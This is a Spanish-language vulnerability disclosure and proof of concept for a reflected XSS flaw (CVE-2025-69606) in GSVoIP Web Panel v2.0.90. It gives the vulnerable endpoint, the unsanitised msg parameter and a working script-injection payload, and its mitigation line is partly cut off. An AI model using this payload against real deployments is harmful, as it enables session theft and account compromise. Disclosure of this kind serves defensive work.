
Prueba de concepto para una vulnerabilidad XSS reflejado (CVE-2025-69606) en GSVoIP Web Panel v2.0.90, que demuestra la ejecución arbitraria de JavaScript sin autenticación a través del parámetro msg.
Severidad: Media | CWE: CWE-79 | Auth Requerida: No | Vector: Remoto
Se identificó una vulnerabilidad de Cross-Site Scripting (XSS) Reflejado en el Panel Web de GSVoIP (v2.0.90). El parámetro msg del endpoint de error no sanitiza la entrada controlada por el usuario antes de reflejarla en la respuesta HTML, lo que permite la ejecución arbitraria de JavaScript en el navegador de la víctima.
| Campo | Detalles |
|---|---|
| Producto | Panel Web de GSVoIP |
| Versión | 2.0.90 (probablemente versiones anteriores) |
| Proveedor | Solutions VoIP (GS Solutions) |
| CWE | CWE-79 — Cross-Site Scripting |
| Vector de Ataque | Remoto / Red |
| Autenticación | No requerida |
GET /painel/gateways.php/error?msg=<payload>
El parámetro msg se refleja directamente en la respuesta HTML sin sanitización ni codificación de salida.
https://{TARGET}/painel/gateways.php/error?msg=%3Cscript%3Ealert(1)%3C%2Fscript%3E
Decodificado:
<script>alert(1)</script>
Cuando se accede a la URL manipulada, el payload inyectado se ejecuta en el navegador de la víctima:
alert(1)
msg.script-src restrictivas.| Paso | Evento |
|---|---|
| 1 | Vulnerabilidad descubierta y reportada por Luiz Eduardo |
| 2 | CVE asignado: CVE-2025-69606 |
| 3 | Divulgación pública |
Descubierto y reportado por Luiz Eduardo
CVE-2025-69606 · CWE-79 · GSVoIP Web Panel v2.0.90